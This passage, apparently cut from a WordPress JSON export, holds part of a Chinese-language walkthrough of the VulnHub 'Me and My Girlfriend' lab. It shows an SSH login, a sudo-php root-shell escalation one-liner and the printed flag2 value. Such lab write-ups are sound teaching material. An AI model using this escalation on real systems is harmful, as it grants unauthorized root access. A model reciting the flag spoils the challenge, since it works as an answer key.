src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-348\"  sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u4e8eflag2\u9700\u8981root\u6743\u9650\uff0c\u731c\u60f3\u53ef\u80fd\u5b58\u653e\u5728root\u76ee\u5f55\u4e0b\uff0c\u5207\u6362\u5230root\u76ee\u5f55\uff0c\u770b\u5230flag2.txt\uff0c\u67e5\u770b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# ssh alice@192.168.11.133\nalice@192.168.11.133's password: \nLast login: Sun Jun 29 19:01:29 2025 from 192.168.11.128\nalice@gfriEND:~$ sudo -l\nMatching Defaults entries for alice on gfriEND:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n\nUser alice may run the following commands on gfriEND:\n    (root) NOPASSWD: \/usr\/bin\/php\nalice@gfriEND:~$ whoami\nalice\nalice@gfriEND:~$ root\nThe program 'root' is currently not installed. To run 'root' please ask your administrator to install the package 'root-system-bin'\nalice@gfriEND:~$ ls\nalice@gfriEND:~$ ls\nalice@gfriEND:~$ whoami\nalice\nalice@gfriEND:~$ whoami\nalice\nalice@gfriEND:~$ sudo php -r \"system('\/bin\/sh');\"\nwhoami\nroot\n\ncd \/root\nls\nflag2.txt\nflag2.txt\n\/bin\/sh: 5: flag2.txt: not found\ncat flag2.txt\n\n  ________        __    ___________.__             ___________.__                ._.\n \/  _____\/  _____\/  |_  __    ___\/|  |__   ____   _   _____\/|  | _____     ____| |\n\/     ___ \/  _    __   |    |   |  |  _\/ __    |    __)  |  | __     \/ ___ |\n    _  (  &lt;_&gt; )  |     |    |   |   Y    ___\/   |        |  |__\/ __ _\/ \/_\/  &gt;|\n ______  \/____\/|__|     |____|   |___|  \/___  &gt;  ___  \/   |____(____  \/___  \/__\n        \/                              \/     \/       \/              \/\/_____\/ \/\n\nYeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)\n\nContact me if you want to contribute \/ give me feedback \/ share your writeup!\nTwitter: @makegreatagain_\nInstagram: @aldodimas73\n\nThanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u5230flag2<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e0b\u8f7d\u5730\u5740\uff1ahttps:\/\/www.vulnhub.com\/entry\/me-and-my-girlfriend [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,9],"tags":[],"class_list":["post-333","post","type-post","status-publish","format-standard","hentry","category-vulnhub","category-wp"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=333"}],"version-history":[{"count":1,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions"}],"predecessor-version":[{"id":349,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions\/349"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=333"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=333"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}